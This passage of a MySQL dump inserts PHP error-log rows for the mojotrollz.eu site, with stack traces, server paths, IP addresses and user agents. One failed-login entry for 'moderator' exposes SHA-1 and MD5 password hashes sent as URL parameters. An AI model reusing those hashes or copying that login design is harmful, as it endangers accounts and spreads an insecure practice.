false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-28 14:39:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&name=basic_success&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (360, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod__system_sai_saimod_sys_log_action_stats_name_basic_success', 'f7c42861a370589c6dfc8f407cd2126647ef495f', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'\\\\SYSTEM\\\\SAI\\\\sai...\', \'sai_mod__system...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.240', 0.016, '2014-11-28 14:40:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_success&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (361, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n)\n', '4b3aa129f01c832e894e9d4bf0886c2f3028f983', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 64, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 14:57:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (362, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n)\n', '4b3aa129f01c832e894e9d4bf0886c2f3028f983', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 14:58:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (363, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => 1\n [ID] => 1\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'b\'?\', b\'?\', b\'?\', b\'?\', b\'?\', b\'?\', b\'?\')\' at line 1\n [message] => Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'b\'?\', b\'?\', b\'?\', b\'?\', b\'?\', b\'?\', b\'?\')\' at line 1\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [file] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [5] => 27\n [line] => 27\n [6] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [trace] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [7] => 37.24.146.18\n [ip] => 37.24.146.18\n [8] => 0.028\n [querytime] => 0.028\n [9] => 2013-12-25 20:45:55\n [time] => 2013-12-25 20:45:55\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/test.php\n [request_uri] => /web/mojotrollz/test.php\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => \n [http_referer] => \n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [1] => Array\n (\n [0] => 2\n [ID] => 2\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'?, b?, b?, b?, b?, b?, b?)\' at line 1\n [message] => Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'?, b?, b?, b?, b?, b?, b?)\' at line 1\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [file] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [5] => 27\n [line] => 27\n [6] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [trace] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [7] => 37.24.146.18\n [ip] => 37.24.146.18\n [8] => 0.036\n [querytime] => 0.036\n [9] => 2013-12-25 20:46:22\n [time] => 2013-12-25 20:46:22\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/test.php\n [request_uri] => /web/mojotrollz/test.php\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => \n [http_referer] => \n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [2] => Array\n (\n [0] => 3\n [ID] => 3\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Could not execute prepare statement: Duplicate entry \'stdClass\' for key \'PRIMARY\'\n [message] => Could not execute prepare statement: Duplicate entry \'stdClass\' for key \'PRIMARY\'\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [file] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [5] => 39\n [line] => 39\n [6] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [trace] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [7] => 37.24.146.18\n [ip] => 37.24.146.18\n [8] => 0.032\n [querytime] => 0.032\n [9] => 2013-12-25 20:57:08\n [time] => 2013-12-25 20:57:08\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/test.php\n [request_uri] => /web/mojotrollz/test.php\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => \n [http_referer] => \n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [3] => Array\n (\n [0] => 4\n [ID] => 4\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Could not execute prepare statement: Duplicate entry \'stdClass\' for key \'PRIMARY\'\n [message] => Could not execute prepare statement: Duplicate entry \'stdClass\' for key \'PRIMARY\'\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [file] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [5] => 39\n [line] => 39\n [6] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [trace] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [7] => 37.24.146.18\n [ip] => 37.24.146.18\n [8] => 0.028\n [querytime] => 0.028\n [9] => 2013-12-25 21:01:00\n [time] => 2013-12-25 21:01:00\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/test.php\n [request_uri] => /web/mojotrollz/test.php\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => \n [http_referer] => \n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [4] => Array\n (\n [0] => 5\n [ID] => 5\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Could not execute prepare statement: Duplicate entry \'stdClass\' for key \'PRIMARY\'\n [message] => Could not execute prepare statement: Duplicate entry \'stdClass\' for key \'PRIMARY\'\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [file] => /home/web/webdir/system/db/connection/ConnectionMYS.php\n [5] => 39\n [line] => 39\n [6] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [trace] => #0 /home/web/webdir/system/db/connection/Connection.php(31): SYSTEM\\DB\\ConnectionMYS->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#1 /home/web/webdir/system/docu/code_docu.php(58): SYSTEM\\DB\\Connection->prepare(\'insert_class\', \'INSERT INTO `sy...\', Array)\n#2 /home/web/webdir/system/docu/code_docu.php(11): SYSTEM\\DOCU\\code_docu::reflect_class(Object(ReflectionClass))\n#3 /home/web/webdir/mojotrollz/test.php(10): SYSTEM\\DOCU\\code_docu::generate()\n#4 {main}\n [7] => 37.24.146.18\n [ip] => 37.24.146.18\n [8] => 0.028\n [querytime] => 0.028\n [9] => 2013-12-25 21:03:34\n [time] => 2013-12-25 21:03:34\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/test.php\n [request_uri] => /web/mojotrollz/test.php\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => \n [http_referer] => \n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [5] => Array\n (\n [0] => 6\n [ID] => 6\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Class not found: wizard_visuals\n [message] => Class not found: wizard_visuals\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/system/autoload.php\n [file] => /home/web/webdir/system/system/autoload.php\n [5] => 66\n [line] => 66\n [6] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'wizard_visuals\')\n#1 [internal function]: __autoload_system(\'wizard_visuals\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(12): spl_autoload_call(\'wizard_visuals\')\n#3 [internal function]: page_mojotrollz::action_wizard_visuals()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [trace] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'wizard_visuals\')\n#1 [internal function]: __autoload_system(\'wizard_visuals\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(12): spl_autoload_call(\'wizard_visuals\')\n#3 [internal function]: page_mojotrollz::action_wizard_visuals()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [7] => 84.167.4.98\n [ip] => 84.167.4.98\n [8] => 0.008\n [querytime] => 0.008\n [9] => 2013-12-26 19:24:47\n [time] => 2013-12-26 19:24:47\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/?action=wizard_visuals\n [request_uri] => /web/mojotrollz/?action=wizard_visuals\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => http://mojotrollz.eu/web/mojotrollz/\n [http_referer] => http://mojotrollz.eu/web/mojotrollz/\n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [6] => Array\n (\n [0] => 7\n [ID] => 7\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Class not found: wizard_skills\n [message] => Class not found: wizard_skills\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/system/autoload.php\n [file] => /home/web/webdir/system/system/autoload.php\n [5] => 66\n [line] => 66\n [6] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'wizard_skills\')\n#1 [internal function]: __autoload_system(\'wizard_skills\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(18): spl_autoload_call(\'wizard_skills\')\n#3 [internal function]: page_mojotrollz::action_wizard_skills()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [trace] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'wizard_skills\')\n#1 [internal function]: __autoload_system(\'wizard_skills\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(18): spl_autoload_call(\'wizard_skills\')\n#3 [internal function]: page_mojotrollz::action_wizard_skills()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [7] => 84.167.4.98\n [ip] => 84.167.4.98\n [8] => 0.008\n [querytime] => 0.008\n [9] => 2013-12-26 19:24:52\n [time] => 2013-12-26 19:24:52\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/?action=wizard_skills\n [request_uri] => /web/mojotrollz/?action=wizard_skills\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => http://mojotrollz.eu/web/mojotrollz/\n [http_referer] => http://mojotrollz.eu/web/mojotrollz/\n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [7] => Array\n (\n [0] => 8\n [ID] => 8\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Class not found: wizard_summ\n [message] => Class not found: wizard_summ\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/system/autoload.php\n [file] => /home/web/webdir/system/system/autoload.php\n [5] => 66\n [line] => 66\n [6] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'wizard_summ\')\n#1 [internal function]: __autoload_system(\'wizard_summ\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(24): spl_autoload_call(\'wizard_summ\')\n#3 [internal function]: page_mojotrollz::action_wizard_summ()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [trace] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'wizard_summ\')\n#1 [internal function]: __autoload_system(\'wizard_summ\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(24): spl_autoload_call(\'wizard_summ\')\n#3 [internal function]: page_mojotrollz::action_wizard_summ()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [7] => 84.167.4.98\n [ip] => 84.167.4.98\n [8] => 0.004\n [querytime] => 0.004\n [9] => 2013-12-26 19:25:24\n [time] => 2013-12-26 19:25:24\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/?action=wizard_summ\n [request_uri] => /web/mojotrollz/?action=wizard_summ\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => http://mojotrollz.eu/web/mojotrollz/\n [http_referer] => http://mojotrollz.eu/web/mojotrollz/\n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [8] => Array\n (\n [0] => 9\n [ID] => 9\n [1] => SYSTEM\\LOG\\WARNING\n [class] => SYSTEM\\LOG\\WARNING\n [2] => Login Failed, User was not found in db\n [message] => Login Failed, User was not found in db\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/security/Security.php\n [file] => /home/web/webdir/system/security/Security.php\n [5] => 130\n [line] => 130\n [6] => #0 /home/web/webdir/system/api/api_login.php(21): SYSTEM\\SECURITY\\Security::login(\'moderator\', \'79f52b5b92498b0...\', \'0408f3c997f309c...\')\n#1 [internal function]: SYSTEM\\API\\api_login::call_account_action_login(\'moderator\', \'79f52b5b92498b0...\', \'0408f3c997f309c...\')\n#2 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}\n [trace] => #0 /home/web/webdir/system/api/api_login.php(21): SYSTEM\\SECURITY\\Security::login(\'moderator\', \'79f52b5b92498b0...\', \'0408f3c997f309c...\')\n#1 [internal function]: SYSTEM\\API\\api_login::call_account_action_login(\'moderator\', \'79f52b5b92498b0...\', \'0408f3c997f309c...\')\n#2 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}\n [7] => 84.167.4.98\n [ip] => 84.167.4.98\n [8] => 0.032\n [querytime] => 0.032\n [9] => 2013-12-26 19:25:58\n [time] => 2013-12-26 19:25:58\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/api.php?call=account&action=login&username=moderator&password_sha=79f52b5b92498b00cb18284f1dcb466bd40ad559&password_md5=0408f3c997f309c03b08bf3a4bc7b730\n [request_uri] => /web/mojotrollz/api.php?call=account&action=login&username=moderator&password_sha=79f52b5b92498b00cb18284f1dcb466bd40ad559&password_md5=0408f3c997f309c03b08bf3a4bc7b730\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => http://mojotrollz.eu/web/mojotrollz/?\n [http_referer] => http://mojotrollz.eu/web/mojotrollz/?\n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 0\n [user] => 0\n [17] => 1\n [thrown] => 1\n )\n\n [9] => Array\n (\n [0] => 10\n [ID] => 10\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Class not found: user_bank\n [message] => Class not found: user_bank\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/system/autoload.php\n [file] => /home/web/webdir/system/system/autoload.php\n [5] => 66\n [line] => 66\n [6] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'user_bank\')\n#1 [internal function]: __autoload_system(\'user_bank\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(33): spl_autoload_call(\'user_bank\')\n#3 [internal function]: page_mojotrollz::action_user_bank()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [trace] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'user_bank\')\n#1 [internal function]: __autoload_system(\'user_bank\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(33): spl_autoload_call(\'user_bank\')\n#3 [internal function]: 